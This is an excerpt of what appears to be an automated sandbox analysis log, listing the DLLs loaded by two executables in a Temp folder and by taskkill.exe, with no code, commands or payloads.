Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Section loaded: pnrpnsp.dll
